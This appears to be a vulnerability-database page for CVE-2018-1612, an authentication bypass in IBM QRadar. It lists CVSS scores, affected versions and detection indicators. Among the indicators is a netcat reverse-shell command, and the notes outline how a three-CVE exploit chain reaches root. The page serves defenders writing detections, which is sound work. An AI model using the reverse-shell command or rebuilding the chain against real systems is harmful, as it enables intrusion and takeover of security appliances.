cbcvebase.
CVE-2018-1612
published 2018-07-17

CVE-2018-1612: IBM QRadar Incident Forensics (IBM QRadar SIEM 7.2, and 7.3) could allow a remote attacker to bypass authentication and obtain sensitive information. IBM…

PriorityP258medium5.8CVSS 3.0
AVNACLPRNUINSCCLINAN
EXPLOIT
EPSS
56.95%
98.9th percentile
IBM QRadar Incident Forensics (IBM QRadar SIEM 7.2, and 7.3) could allow a remote attacker to bypass authentication and obtain sensitive information. IBM X-Force ID: 144164.

Affected

6 ranges
VendorProductVersion rangeFixed in
ibmqradar_security_information_and_event_manager
ibmqradar_security_information_and_event_manager
ibmqradar_security_information_and_event_manager
ibmqradar_security_information_and_event_manager7.2.0 – 7.2.8
ibmqradar_siem
ibmqradar_siem

Detection & IOCsextracted from sources · hover to see the quote

url/ForensicsAnalysisServlet/
url/ForensicsAnalysisServlet/?action=setSecurityTokens
cookieSEC=<uuid>; QRadarCSRF=<uuid>
path/store/configservices/staging/updates/
path/opt/qradar/conf/nva.conf
path/opt/qradar/support/changePasswd.sh
port443
port4448
command/usr/bin/nc -e /bin/sh <LHOST> <LPORT> &
  • Alert on GET requests to /ForensicsAnalysisServlet/ returning HTTP 403 — the module uses this as a fingerprint to confirm the vulnerable endpoint is present.
  • Monitor for new or modified files written under /store/configservices/staging/updates/ by the 'nobody' user — this is where the attacker-controlled shell script is staged for root execution.
  • Detect outbound HTTP/HTTPS connections from the QRadar host to attacker-controlled infrastructure on non-standard port 4448, used to download the privilege escalation payload.
  • Alert on execution of /usr/bin/nc with the -e flag spawned from a QRadar process context — this is the reverse shell command dropped and executed as part of the exploit chain.
  • The exploit chain requires three CVEs chained together (CVE-2016-9722, CVE-2018-1418, CVE-2018-1612); correlate all three in SIEM alerts for high-confidence detection of this specific attack.
  • ·The Forensics web application is disabled in QRadar Community Edition but the vulnerable code is still present and reachable, meaning all QRadar flavours are exploitable regardless of whether Forensics is enabled.
  • ·Confirmed vulnerable versions span IBM QRadar SIEM up to 7.2.8 patch 12 and 7.3.1 patch 3; detections should cover both 7.2 and 7.3 branches.
  • ·The exploit's final privilege escalation stage relies on a QRadar scheduled task executing the attacker's script as root; the delay between initial compromise and root execution can be up to ~80 seconds, which may affect timing-based detections.

CVSS provenance

nvdv3.05.8MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.